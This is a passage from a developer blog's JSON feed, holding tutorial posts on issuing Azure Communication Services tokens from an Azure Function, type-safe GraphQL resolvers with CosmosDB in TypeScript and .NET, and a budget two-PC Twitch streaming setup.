SWA provides a mechanism to do that via its config file, but we also want to get access to the user profile and validate it (we won’t use the profile yet, but in the future we will).\nTime to remove the boilerplate Function code and start putting in ours:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; type ClientPrincipal = { identityProvider: string; userId: string; userDetails: string; userRoles: string[]; }; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { const header = req.headers["x-ms-client-principal"]; const encoded = Buffer.from(header, "base64"); const decoded = encoded.toString("ascii"); const principal: ClientPrincipal = JSON.parse(decoded); if (!principal.userId) { context.res = { status: 401, body: "The user name is required to ensure their access token" }; return; } context.res = { body: "TODO" }; }; export default httpTrigger; Here we’re unpacking the header and ensuring that there is a userId in the principal, if not, then we’ll return bad request.\nNow we’re going to integrate the the ACS administration npm package, @azure/communication-administration which gives us the ability to issue a token for the user. This token is then used in the client application to connect with ACS and do whatever we’re allowing the client to do.\n1 npm install --save @azure/communication-administration With the package installed, we can incorporate it in and issue our token. To do that we need to create a CommunicationIdentityClient, in which we provide the connection string to ACS.\nIf you haven’t created an ACS resource yet, check out the docs.\n1 2 3 4 5 6 7 8 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { CommunicationIdentityClient } from "@azure/communication-administration"; const identityClient = new CommunicationIdentityClient( process.env["COMMUNICATION_SERVICES_CONNECTION_STRING"] ); // snip I’ve added a connection string to the local.settings.json, as per Azure Functions docs called COMMUNICATION_SERVICES_CONNECTION_STRING that gives me access to ACS.\nOnce the identityClient is ready, we can use it within the Function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 // snip const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { const header = req.headers["x-ms-client-principal"]; const encoded = Buffer.from(header, "base64"); const decoded = encoded.toString("ascii"); const principal: ClientPrincipal = JSON.parse(decoded); if (!principal.userId) { context.res = { status: 401, body: "The user name is required to ensure their access token" }; return; } const user = await identityClient.createUser(); const tokenResponse = await identityClient.issueToken(user, ["voip"]); context.res = { // status: 200, /* Defaults to 200 */ body: { token: tokenResponse.token, expiresOn: tokenResponse.expiresOn, communicationUserId: user.communicationUserId } as TokenResponse }; }; export default httpTrigger; The important lines from above are these two lines:\n1 2 const user = await identityClient.createUser(); const tokenResponse = await identityClient.issueToken(user, ["voip"]); The first is creating a user in ACS. Notice how this user doesn’t have any direct relationship to the user account we’ve got in our system already. 
This does mean that we’re creating a whole new user each time that we want a token, rather than associating the ACS user with our system’s user, so down the track we’re going to need to work out how to do that more effectively, but this is ok for the moment. Once we have our CommunicationUser we then call the issueToken method, and provide it with the scopes that we want the user to have, in this case the token will only allow them to have VOIP capabilities, but if you wanted them to have chat as well, then you’d need to explicitly grant them that.\nBut with that, our backend is done and we’re able to issue tokens for the client application.\nConclusion This isn’t everything that we managed to get to in the first episode, but it is the most important thing because once we can issue tokens we can start to build up the client application. You’ll find the code in the part-01 tag on GitHub, and you can watch the whole episode on YouTube. Next time, we’re going to start displaying camera feeds and accessing the microphone.\n", "id": "2020-10-06-building-a-video-chat-app-part-1-setup" }, { "title": "New Stream Series: Building a Video Calling App", "url": "https://www.aaron-powell.com/posts/2020-09-29-new-stream-series-building-a-video-calling-app/", "date": "Tue, 29 Sep 2020 11:43:39 +1000", "tags": [ "javascript", "azure" ], "description": "Let's check out a new Azure service and build a video calling app", "content": "Last week at Microsoft Ignite there was a new service announced, Azure Communication Services (ACS).\nACS is, essentially, the Teams backend for video, chat, telephone and SMS, but as a service you can integrate into your own applications.\nSo I decided that I wanted to check it out and as such I’m going to be doing a weekly stream where we look to build an app using ACS and also look at how we can integrate ACS with other parts of Azure (I’m particularly interested to play with Cognitive Services and ACS).\nFor this series though, I’m not going to stream primarily on my Twitch channel, but on the Microsoft Developer Twitch channel, as well as our LearnTV platform.
The videos will also be available on my YouTube channel.\nWe’ll be kicking off at 2pm AEST, Wednesday 30th September (which is 9pm the previous day in PST).\nSee you on the stream!\n", "id": "2020-09-29-new-stream-series-building-a-video-calling-app" }, { "title": "GraphQL on Azure: Part 5 - Can We Make GraphQL Type Safe in Code", "url": "https://www.aaron-powell.com/posts/2020-09-17-graphql-on-azure-part-5-can-we-make-graphql-type-safe-in-code/", "date": "Thu, 17 Sep 2020 15:21:02 +1000", "tags": [ "azure", "serverless", "azure-functions", "javascript", "graphql" ], "description": "We're defining a GraphQL schema with a type system, but can we use that type system for our application?", "content": "I’ve been doing a lot of work recently with GraphQL on Azure Functions and something that I find works nicely is the schema-first approach to designing the GraphQL endpoint.\nThe major drawback I’ve found though is that you start with a strongly typed schema but lose that type information when implementing the resolvers and working with your data model.\nSo let’s have a look at how we can tackle that by building an application with GraphQL on Azure Functions and backing it with a data model in CosmosDB, all written in TypeScript.\nTo learn how to get started with GraphQL on Azure Functions, check out the earlier posts in this series.\nCreating our schema The API we’re going to build today is a trivia API (which uses data from Open Trivia DB as the source).\nWe’ll start by defining a schema that’ll represent the API as a file named schema.graphql within the graphql folder:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 type Question { id: ID! question: String! correctAnswer: String! answers: [String!]! } type Query { question(id: ID!): Question getRandomQuestion: Question } type Answer { questionId: ID question: String! submittedAnswer: String! correctAnswer: String! correct: Boolean } type Mutation { answerQuestion(id: ID, answer: String): Answer } schema { query: Query mutation: Mutation } Our schema has defined two core types, Question and Answer, along with a few queries and a mutation, and all these types are decorated with useful GraphQL type annotations that would be useful to have respected in our TypeScript implementation of the resolvers.\nCreating a resolver Let’s start with the query resolvers; these will need to get the data back from CosmosDB to return to our consumer:\n1 2 3 4 5 6 7 8 9 10 11 12 13 const resolvers = { Query: { question(_, { id }, { dataStore }) { return dataStore.getQuestionById(id); }, async getRandomQuestion(_, __, { dataStore }) { const questions = await dataStore.getQuestions(); return questions[Math.floor(Math.random() * questions.length) + 1]; } } }; export default resolvers; This matches the structure of the query portion of our schema, but how did we know how to implement the resolver functions? What arguments are passed to question and getRandomQuestion? We know that question will receive an id parameter, but how? If we look at this in TypeScript there’s any all over the place, and that means we’re not getting much value from TypeScript.\nHere’s where we start having a disconnect between the code we’re writing, and the schema we’re working against.\nEnter GraphQL Code Generator Thankfully, there’s a tool out there that can help solve this for us, GraphQL Code Generator.
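To make that gap concrete, here's the kind of annotation you'd otherwise be hand-writing for just the question resolver; QuestionArgs and ResolverContext are made-up names here, and they'd have to be kept in sync with the schema by hand as it evolves:

// Hand-rolled types that mirror the schema - illustrative only.
type QuestionArgs = { id: string };
type ResolverContext = {
  dataStore: { getQuestionById(id: string): Promise<unknown> };
};

const question = (
  _parent: unknown,
  { id }: QuestionArgs,
  { dataStore }: ResolverContext
) => dataStore.getQuestionById(id);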
Let’s set it up by installing the tool:\n1 npm install --save-dev @graphql-codegen/cli And we’ll setup a config file named config.yml in the root of our Functions app:\n1 2 3 4 5 6 7 overwrite: true schema: "./graphql/schema.graphql" generates: graphql/generated.ts: plugins: - typescript - typescript-resolvers This will generate a file named generated.ts within the graphql folder using our schema.graphql as the input. The output will be TypeScript and we’re also going to generate the resolver signatures using the typescript and typescript-resolvers plugins, so we best install those too:\n1 npm install --save-dev @graphql-codegen/typescript @graphql-codegen/typescript-resolvers It’s time to run the generator:\n1 npx graphql-codegen --config codegen.yml Strongly typing our resolvers We can update our resolvers to use this new type information:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import { Resolvers } from "./generated"; const resolvers: Resolvers = { Query: { question(_, { id }, { dataStore }) { return dataStore.getQuestionById(id); }, async getRandomQuestion(_, __, { dataStore }) { const questions = await dataStore.getQuestions(); return questions[Math.floor(Math.random() * questions.length) + 1]; } } }; export default resolvers; Now we can hover over something like id and see that it’s typed as a string, but we’re still missing a piece, what is dataStore and how do we know what type to make it?\nCreating a data store Start by creating a new file named data.ts. This will house our API to work with CosmosDB, and since we’re using CosmosDB we’ll need to import the node module:\n1 npm install --save @azure/cosmos Why CosmosDB? CosmosDB have just launched a serverless plan which works nicely with the idea of a serverless GraphQL host in Azure Functions. Serverless host with a serverless data store, sound like a win all around!\nWith the module installed we can implement our data store:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 import { CosmosClient } from "@azure/cosmos"; export type QuestionModel = { id: string; question: string; category: string; incorrect_answers: string[]; correct_answer: string; type: string; difficulty: "easy" | "medium" | "hard"; }; interface DataStore { getQuestionById(id: string): Promise<QuestionModel>; getQuestions(): Promise<QuestionModel[]>; } class CosmosDataStore implements DataStore { #client: CosmosClient; #databaseName = "trivia"; #containerName = "questions"; #getContainer = () => { return this.#client .database(this.#databaseName) .container(this.#containerName); }; constructor(client: CosmosClient) { this.#client = client; } async getQuestionById(id: string) { const container = this.#getContainer(); const question = await container.items .query<QuestionModel>({ query: "SELECT * FROM c WHERE c.id = @id", parameters: [{ name: "@id", value: id }], }) .fetchAll(); return question.resources[0]; } async getQuestions() { const container = this.#getContainer(); const question = await container.items .query<QuestionModel>({ query: "SELECT * FROM c", }) .fetchAll(); return question.resources; } } export const dataStore = new CosmosDataStore( new CosmosClient(process.env.CosmosDB) ); This class will receive a CosmosClient that gives us the connection to query CosmosDB and provides the two functions that we used in the resolver. 
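As a quick sanity check, the exported dataStore can be exercised on its own before we wire it into GraphQL. Here's a rough sketch, assuming the CosmosDB connection string environment variable from above is set and the trivia data has been loaded:

import { dataStore } from "./data";

// Quick smoke test of the data store outside of GraphQL.
async function smokeTest() {
  const questions = await dataStore.getQuestions();
  console.log(`Loaded ${questions.length} questions`);

  const first = await dataStore.getQuestionById(questions[0].id);
  console.log(first.question);
}

smokeTest().catch(console.error);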
We’ve also got a data model, QuestionModel that represents how we’re storing the data in CosmosDB.\nTo create a CosmosDB resource in Azure, check out their quickstart and here is a data sample that can be uploaded via the Data Explorer in the Azure Portal._\nTo make this available to our resolvers, we’ll add it to the GraphQL context by extending index.ts:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 import { ApolloServer } from "apollo-server-azure-functions"; import { importSchema } from "graphql-import"; import resolvers from "./resolvers"; import { dataStore } from "./data"; const server = new ApolloServer({ typeDefs: importSchema("./graphql/schema.graphql"), resolvers, context: { dataStore } }); export default server.createHandler(); If we run the server, we’ll be able to query the endpoint and have it pull data from CosmosDB but our resolver is still lacking a type for dataStore, and to do that we’ll use a custom mapper.\nCustom context types So far, the types we’re generating are all based off what’s in our GraphQL schema, and that works mostly but there are gaps. One of those gaps is how we use the request context in a resolver, since this doesn’t exist as far as the schema is concerned we need to do something more for the type generator.\nLet’s define the context type first by adding this to the bottom of data.ts:\n1 2 3 export type Context = { dataStore: DataStore; }; Now we can tell GraphQL Code Generator to use this by modifying our config:\n1 2 3 4 5 6 7 8 9 overwrite: true schema: "./graphql/schema.graphql" generates: graphql/generated.ts: config: contextType: "./data#Context" plugins: - "typescript" - "typescript-resolvers" We added a new config node in which we specify the contextType in the form of <path>#<type name> and when we run the generator the type is used and now the dataStore is typed in our resolvers!\nCustom models It’s time to run our Function locally.\n1 npm start And let’s query it. We’ll grab a random question:\n1 2 3 4 5 6 7 { getRandomQuestion { id question answers } } Unfortunately, this fails with the following error:\nCannot return null for non-nullable field Question.answers.\nIf we refer back to our Question type in the GraphQL schema:\n1 2 3 4 5 6 type Question { id: ID! question: String! correctAnswer: String! answers: [String!]! } This error message makes sense as answers is a non-nullable array of non-nullable strings ([String!]!), but if that’s compared to our data model in Cosmos:\n1 2 3 4 5 6 7 8 9 export type QuestionModel = { id: string; question: string; category: string; incorrect_answers: string[]; correct_answer: string; type: string; difficulty: "easy" | "medium" | "hard"; }; Well, there’s no answers field, we only have incorrect_answers and correct_answer.\nIt’s time to extend our generated types a bit further using custom models. 
We’ll start by updating the config file:\n1 2 3 4 5 6 7 8 9 10 11 overwrite: true schema: "./graphql/schema.graphql" generates: graphql/generated.ts: config: contextType: "./data#Context" mappers: Question: ./data#QuestionModel plugins: - "typescript" - "typescript-resolvers" With the mappers section, we’re telling the generator when you find the Question type in the schema, it’s use QuestionModel as the parent type.\nBut this still doesn’t tell GraphQL how to create the answers field, for that we’ll need to define a resolver on the Question type:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import { Resolvers } from "./generated"; const resolvers: Resolvers = { Query: { question(_, { id }, { dataStore }) { return dataStore.getQuestionById(id); }, async getRandomQuestion(_, __, { dataStore }) { const questions = await dataStore.getQuestions(); return questions[Math.floor(Math.random() * questions.length) + 1]; } }, Question: { answers(question) { return question.incorrect_answers .concat([question.correct_answer]) .sort(); }, correctAnswer(question) { return question.correct_answer; } } }; export default resolvers; These field resolvers will receive a parent as their first argument that is the QuestionModel and expect to return the type as defined in the schema, making it possible to do mapping of data between types as required.\nIf you restart your Azure Functions and execute the query from before, a random question is returned from the API.\nConclusion We’ve taken a look at how we can build on the idea of deploying GraphQL on Azure Functions and looked at how we can use the GraphQL schema, combined with our own models, to enforce type safety with TypeScript.\nWe didn’t implement the mutation in this post, that’s an exercise for you as the reader to tackle.\nYou can check out the full example, including how to connect it with a React front end, on GitHub.\nThis article is part of #ServerlessSeptember (https://aka.ms/ServerlessSeptember2020). You’ll find other helpful articles, detailed tutorials, and videos in this all-things-Serverless content collection. New articles from community members and cloud advocates are published every week from Monday to Thursday through September.\nFind out more about how Microsoft Azure enables your Serverless functions at https://docs.microsoft.com/azure/azure-functions/\n", "id": "2020-09-17-graphql-on-azure-part-5-can-we-make-graphql-type-safe-in-code" }, { "title": "Two PC Streaming for Minimal Cost", "url": "https://www.aaron-powell.com/posts/2020-09-08-two-pc-streaming-for-minimal-cost/", "date": "Tue, 08 Sep 2020 15:08:09 +1000", "tags": [ "streaming", "public-speaking" ], "description": "Can you make a two PC stream setup without spending much money?", "content": "Like many people, I’ve started streaming on Twitch, and like many people, I might not have really thought about what I was getting myself into when I started doing it.\nMy main machine is a Surface Book 2 i7 with 16GB of memory, which is more than adequate for day-to-day work but this doesn’t mean that it’s the right thing to try and run a streaming setup. As soon as I fire up OBS and have a few apps running, things start grinding to a halt. You can see this on a few of my early streams, some operations that should take seconds, started taking minutes (like opening a browser tab). 
This results in a sub-optimal experience as a content creator and as a viewer, so I decided to try and solve it.\nBut there’s a catch, I don’t have a huge pile of money sitting around for me to drop on building a super powerful streaming PC, so I needed to think about how to do this as cheaply as possible, which is what I want to talk through today.\nWhy use a streaming PC Before we get started in the how, it’s a good idea to talk about the why, why would you need a streaming PC?\nTo stream, or even to do offline video production, you need to run some software which is generally going to be resource intensive on the machine. Whether it’s OBS, Camtasia, Adobe Premiere or anything like that, you’re going to be running software that is doing video encoding, and that will be either CPU or GPU bound. With a desktop, this is less of a problem, you’ll have a dedicated GPU, but in a laptop you either don’t have a dedicated GPU or the dedicated GPU isn’t the most powerful thing available.\nThis is the case with the Surface Book 2. It’s got a dedicated GPU, and it’s ok, but not great, so the more the system is loaded up with resource demands, the less available resources there are for the software you’re wanting to record.\nEnter a streaming PC. The idea here is that you offload the production side of your content creation to a separate machine and by doing so, freeing up resources on your primary machine.\nHaving a dedicated streaming PC does complicate things though, as you now need to work out how you’re going to get whatever it is you’re displaying on your main machine across to the streaming PC, plus your mic and camera feeds, and this is where things start getting expensive though the use of capture cards, XLR mics, etc.\nSo let’s look at doing it cheaply.\nThe streaming PC I’m a technology hoarder, I don’t get rid of devices when they’ve outlived their usefulness and this means that I have a stack of old laptops around. I’ve got 2x Surface Pro 4 on my desk (as well as 2x Surface 3, a Lenovo Helix, Sony Vaio, Macbook Pro (circa 2008), Surface Pro 1, 2x Surface RT 2 and a desktop (which hasn’t worked for ~6 years) scattered around the house) and I figured that the Pro 4 should be a viable enough device for some basic video production like I need. After all, I had used it in the past to do video production, but it was much more simplistic production that I’m trying to do today.\nSide note, I do have 2x Pi 3 on my desk as well, and it did cross my mind to use that, but I decided against it, they are a bit too underpowered.\nSo an old laptop is a decent enough option when it comes to creating a streaming PC, it doesn’t matter if you’re running 80% CPU while streaming with the fans sounding like an aircraft about to take off, it’s only job is to run the stream and if the fans are too noisy, well it doesn’t need to be on your desk, pop it on the floor.\nStreaming to a streaming PC Finding an old laptop that can run OBS (or any video creation software) is the easy part, now comes the confusing one, how do you get your screen from your main device to your streaming PC?\nWell, the basic idea is that you need to turn an external monitor into an input that can be received by your streaming PC and for this we’d use a capture card.\nIf you’ve started to look at making a streaming PC, chances are you’ve looked at something like the Elgato HD60. 
Cards like this were popularised as a way to get the feed from a console into a PC to do post-production on, but the principal is the same for a PC to PC streaming, it takes a HDMI in and turns it into an available source (often represented as a camera) that you can use within your production software.\nBut that requires a proper PC (not to mention expensive), and we’re repurposing an old laptop, so we need to think a bit more creatively.\nEnter the HDMI to USB converter.\nThis little device takes a HDMI input and then converts it into a USB feed which can then be plugged into a USB port on my laptop. It’s commonly used to capture the output of a DSLR or other professional camera and then feed it into a computer, but HDMI is HDMI, so there’s no reason that we can’t feed our main device in.\nElgato has one of these, it’s called Cam Link 4K and it’s hard to find availability of, plus it’s a few hundred dollars, so it’s not ideal for being overly price sensitive. But over the last few months there has been a flood on the market of really cheap HDMI to USB devices, and I picked up this one for around $40AUD delivered.\nSure, the quality isn’t as high as you’ll get out of a more expensive device, but it’s fit for purpose and at a viable price point that you can work to overcome the quality loss between your main device and streaming device. Would I game with it? No, but showing VS Code and a reasonably unchanging screen, it works well enough.\nMonitors everywhere So we’ve got a device that will take a HDMI input and make it available via USB for our streaming PC, but how do we do that? As soon as you plug in your HDMI cable Windows will detect it as an external monitor and you can now push to it, but that might not be idea because that monitor doesn’t really exist does it? At best, you could look at your streaming PC on the desk next to you, but if you’ve put that laptop on the floor, well now it’s really hard to look at!\nHere we can exploit how Windows multi-display setup works. Now normally you’d have a multi-monitor setup in extended mode so each screen is independent, but that’s no good for our capture device, instead we can extend to one and duplicate the other (assuming you’re already running an external screen).\nThis is my layout, I have a stacked monitor setup with my laptop on the desk and 32" external above it. Within Windows display settings you can select a monitor and under the Multiple Displays choose to duplicate an external monitor to another external, which is just what I did, monitors 2 (my 32") and 3 (my HDMI to USB) are the same thing.\nThis does mean I have to drop the resolution down to 1920x1080, which is what the HDMI to USB accepts, but that’s fine as I’m not going to stream at a higher resolution that that to Twitch anyway.\nNow whatever I do on my external monitor is being pushed over to my streaming PC, ready to be pumped out to the world on Twitch!\nHear me, see me We’re setup to stream our screen but that’s only part of the puzzle, you probably want people to be able to see your camera feed and hear you on your mic. We need to make these available to our streaming PC, but we probably also want them on our main device for the endless hours of video calls we’re all doing now, and you don’t want to be fumbling to rewire your USB setup every time someone calls you up to pair program do you?\nDon’t worry though, there’s a solution for that, a USB switch! 
I picked this one up for about $50AUD delivered and it allows me to plug in 4 devices and switch them easily between my two laptops.\nSo now I have my webcam, mic and stream deck all plugged into the switch, which is then plugged into my Surface Dock (for my Book 2) and then directly into my Pro 4 and with a press of a button I can swap which machine they are connected to.\nQuick aside, I also connect my HDMI to USB through the switch too, but that’s because my Pro 4 has only a single USB input, but if you have multiple USB inputs then use them as I’m pretty much maxing out the USB bus!\nConclusion This is my streaming setup (well normally the laptop lid is up, but that’d hide the cables in the photo), my Surface Book 2 connects to a Surface Dock, which connects an external display + HDMI to USB converter, that feeds the 3rd monitor stream into a USB switch that my camera, mic and stream deck are connected to and allows me to switch between which device they are available for. I then have a repurposed Surface Pro 4 that takes these 4 USB devices in via a single USB input, runs OBS and sends the stream up to Twitch or records locally (depending on my needs).\nAll in all, I spent a little under $100AUD to set this up. I already had the old laptop to use, so being able to improve the quality of my stream for that little money does seem like money well spent and hopefully it shows you how you too can improve the quality of your stream without breaking the bank.\nAnd do you want to see how it turns out? Drop by my stream each Friday lunch time.\n", "id": "2020-09-08-two-pc-streaming-for-minimal-cost" }, { "title": "GraphQL on Azure: Part 4 - Serverless CosmosDB", "url": "https://www.aaron-powell.com/posts/2020-09-04-graphql-on-azure-part-4-serverless-comsosdb/", "date": "Fri, 04 Sep 2020 11:04:32 +1000", "tags": [ "azure", "serverless", "azure-functions", "dotnet", "graphql" ], "description": "Let's take a look at how to integrate a data source with GraphQL on Azure", "content": "A few months ago I wrote a post on how to use GraphQL with CosmosDB from Azure Functions, so this post might feel like a bit of a rehash of it, with the main difference being that I want to look at it from the perspective of doing .NET integration between the two.\nThe reason I wanted to tackle .NET GraphQL with Azure Functions is that it provides a unique opportunity, being able to leverage Function bindings. If you’re new to Azure Functions, bindings are a way to have the Functions runtime provide you with a connection to another service in a read, write or read/write mode. This could be useful in the scenario of a function being triggered by a file being uploaded to storage and then writing some metadata to a queue. But for todays scenario, we’re going to use a HTTP triggered function, our GraphQL endpoint, and then work with a database, CosmosDB.\nWhy CosmosDB? 
Well I thought it might be timely given they have just launched a consumption plan which works nicely with the idea of a serverless GraphQL host in Azure Functions.\nWhile we have looked at using .NET for GraphQL previously in the series, for this post we’re going to use a different GraphQL .NET framework, Hot Chocolate, so there’s going to be some slightly different types to our previous demo, but it’s all in the name of exploring different options.\nGetting Started At the time of writing, Hot Chocolate doesn’t officially support Azure Functions as the host, but there is a proof of concept from a contributor that we’ll use as our starting point, so start by creating a new Functions project:\n1 func init dotnet-graphql-cosmosdb --dotnet Next, we’ll add the NuGet packages that we’re going to require for the project:\n1 2 3 4 5 <PackageReference Include="Microsoft.Azure.Functions.Extensions" Version="1.0.0" /> <PackageReference Include="Microsoft.NET.Sdk.Functions" Version="3.0.3" /> <PackageReference Include="HotChocolate" Version="10.5.2" /> <PackageReference Include="HotChocolate.AspNetCore" Version="10.5.2" /> <PackageReference Include="Microsoft.Azure.WebJobs.Extensions.CosmosDB" Version="3.0.7" /> These versions are all the latest at the time of writing, but you may want to check out new versions of the packages if they are available.\nAnd the last bit of getting started work is to bring in the proof of concept, so grab all the files from the GitHub repo and put them into a new folder under your project called FunctionsMiddleware.\nMaking a GraphQL Function With the skeleton ready, it’s time to make a GraphQL endpoint in our Functions project, and to do that we’ll scaffold up a HTTP Trigger function:\n1 func new --name GraphQL --template "HTTP trigger" This will create a generic function for us and we’ll configure it to use the GraphQL endpoint, again we’ll use a snippet from the proof of concept:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 using System.Threading; using System.Threading.Tasks; using Microsoft.AspNetCore.Mvc; using Microsoft.Azure.WebJobs; using Microsoft.Azure.WebJobs.Extensions.Http; using Microsoft.AspNetCore.Http; using Microsoft.Extensions.Logging; using HotChocolate.AspNetCore; namespace DotNet.GraphQL.CosmosDB { public class GraphQL { private readonly IGraphQLFunctions _graphQLFunctions; public GraphQL(IGraphQLFunctions graphQLFunctions) { _graphQLFunctions = graphQLFunctions; } [FunctionName("graphql")] public async Task<IActionResult> Run( [HttpTrigger(AuthorizationLevel.Anonymous, "get", "post", Route = null)] HttpRequest req, ILogger log, CancellationToken cancellationToken) { return await _graphQLFunctions.ExecuteFunctionsQueryAsync( req.HttpContext, cancellationToken); } } } Something you might notice about this function is that it’s no longer a static, it has a constructor, and that constructor has an argument. 
To make this work we’re going to need to configure dependency injection for Functions.\nAdding Dependency Injection Let’s start by creating a new class to our project called Startup:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 using Microsoft.Azure.Functions.Extensions.DependencyInjection; using Microsoft.Extensions.DependencyInjection; [assembly: FunctionsStartup(typeof(DotNet.GraphQL.CosmosDB.Startup))] namespace DotNet.GraphQL.CosmosDB { public class Startup : FunctionsStartup { public override void Configure(IFunctionsHostBuilder builder) { } } } There’s two things that are important to note about this code, first is that we have the [assembly: FunctionsStartup(... assembly level attribute which points to the Startup class. This tells the Function runtime that we have a class which will do some stuff when the application starts. Then we have the Startup class which inherits from FunctionsStartup. This base class comes from the Microsoft.Azure.Functions.Extensions NuGet package and works similar to the startup class in an ASP.NET Core application by giving us a method which we can work with the startup pipeline and add items to the dependency injection framework.\nWe’ll come back to this though, as we need to create our GraphQL schema first.\nCreating the GraphQL Schema Like our previous demos, we’ll use the trivia app.\nWe’ll start with the model which exists in our CosmosDB store (I’ve populated a CosmosDB instance with a dump from OpenTriviaDB, you’ll find the JSON dump here). Create a new folder called Models and then a file called QuestionModel.cs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 using System.Collections.Generic; using Newtonsoft.Json; namespace DotNet.GraphQL.CosmosDB.Models { public class QuestionModel { public string Id { get; set; } public string Question { get; set; } [JsonProperty("correct_answer")] public string CorrectAnswer { get; set; } [JsonProperty("incorrect_answers")] public List<string> IncorrectAnswers { get; set; } public string Type { get; set; } public string Difficulty { get; set; } public string Category { get; set; } } } As far as our application is aware, this is a generic data class with no GraphQL or Cosmos specific things in it (it has some attributes for helping with serialization/deserialization), now we need to create our GraphQL schema to expose it. We’ll make a new folder called Types and a file called Query.cs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 using DotNet.GraphQL.CosmosDB.Models; using HotChocolate.Resolvers; using Microsoft.Azure.Documents.Client; using Microsoft.Azure.Documents.Linq; using System; using System.Collections.Generic; using System.Linq; using System.Threading.Tasks; namespace DotNet.GraphQL.CosmosDB.Types { public class Query { public async Task<IEnumerable<QuestionModel>> GetQuestions(IResolverContext context) { // TODO } public async Task<QuestionModel> GetQuestion(IResolverContext context, string id) { // TODO } } } This class is again a plain C# class and Hot Chocolate will use it to get the types exposed in our query schema. 
We’ve created two methods on the class, one to get all questions and one to get a specific question, and it would be the equivalent GraphQL schema of:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 type QuestionModel { id: String question: String correctAnswer: String incorrectAnswers: [String] type: String difficulty: String category: String } schema { query: { questions: [QuestionModel] question(id: String): QuestionModel } } You’ll also notice that each method takes an IResolverContext, but that’s not appearing in the schema, well that’s because it’s a special Hot Chocolate type that will give us access to the GraphQL context within the resolver function.\nBut, the schema has a lot of nullable properties in it and we don’t want that, so to tackle this we’ll create an ObjectType for the models we’re mapping. Create a class called QueryType:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 using HotChocolate.Types; namespace DotNet.GraphQL.CosmosDB.Types { public class QueryType : ObjectType<Query> { protected override void Configure(IObjectTypeDescriptor<Query> descriptor) { descriptor.Field(q => q.GetQuestions(default!)) .Description("Get all questions in the system") .Type<NonNullType<ListType<NonNullType<QuestionType>>>>(); descriptor.Field(q => q.GetQuestion(default!, default!)) .Description("Get a question") .Argument("id", d => d.Type<IdType>()) .Type<NonNullType<QuestionType>>(); } } } Here we’re using an IObjectTypeDescription to define some information around the fields on the Query, and the way we want the types exposed in the GraphQL schema, using the built in GraphQL type system. We’ll also do one for the QuestionModel in QuestionType:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 using DotNet.GraphQL.CosmosDB.Models; using HotChocolate.Types; namespace DotNet.GraphQL.CosmosDB.Types { public class QuestionType : ObjectType<QuestionModel> { protected override void Configure(IObjectTypeDescriptor<QuestionModel> descriptor) { descriptor.Field(q => q.Id) .Type<IdType>(); } } } Consuming the GraphQL Schema Before we implement our resolvers, let’s wire up the schema into our application, and to do that we’ll head back to Startup.cs, and register the query, along with Hot Chocolate:\n1 2 3 4 5 6 7 8 9 10 11 12 public override void Configure(IFunctionsHostBuilder builder) { builder.Services.AddSingleton<Query>(); builder.Services.AddGraphQL(sp => SchemaBuilder.New() .AddServices(sp) .AddQueryType<QueryType>() .Create() ); builder.Services.AddAzureFunctionsGraphQL(); } First off we’re registering the Query as a singleton so it can be resolved, and then we’re adding GraphQL from Hot Chocolate. With the schema registration, we’re using a callback that will actually create the schema using SchemaBuilder, registering the available services from the dependency injection container and finally adding our QueryType, so GraphQL understands the nuanced type system.\nLastly, we call an extension method provided by the proof of concept code we included early to register GraphQL support for Functions.\nImplementing Resolvers For the resolvers in the Query class, we’re going to need access to CosmosDB so that we can pull the data from there. 
We could go and create a CosmosDB connection and then register it in our dependency injection framework, but this won’t take advantage of the input bindings in Functions.\nWith Azure Functions we can setup an input binding to CosmosDB, specifically we can get a DocumentClient provided to us, which FUnctions will take care of connection client reuse and other performance concerns that we might get when we’re working in a serverless environment. And this is where the resolver context, provided by IResolverContext will come in handy, but first we’re going to modify the proof of concept a little, so we can add to the context.\nWe’ll start by modifying the IGraphQLFunctions interface and adding a new argument to ExecuteFunctionsQueryAsync:\n1 2 3 4 Task<IActionResult> ExecuteFunctionsQueryAsync( HttpContext httpContext, IDictionary<string, object> context, CancellationToken cancellationToken); This IDictionary<string, object> will allow us to provide any arbitrary additional context information to the resolvers. Now we need to update the implementation in GraphQLFunctions.cs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 public async Task<IActionResult> ExecuteFunctionsQueryAsync( HttpContext httpContext, IDictionary<string, object> context, CancellationToken cancellationToken) { using var stream = httpContext.Request.Body; var requestQuery = await _requestParser .ReadJsonRequestAsync(stream, cancellationToken) .ConfigureAwait(false); var builder = QueryRequestBuilder.New(); if (requestQuery.Count > 0) { var firstQuery = requestQuery[0]; builder .SetQuery(firstQuery.Query) .SetOperation(firstQuery.OperationName) .SetQueryName(firstQuery.QueryName); foreach (var item in context) { builder.AddProperty(item.Key, item.Value); } if (firstQuery.Variables != null && firstQuery.Variables.Count > 0) { builder.SetVariableValues(firstQuery.Variables); } } var result = await Executor.ExecuteAsync(builder.Create()); await 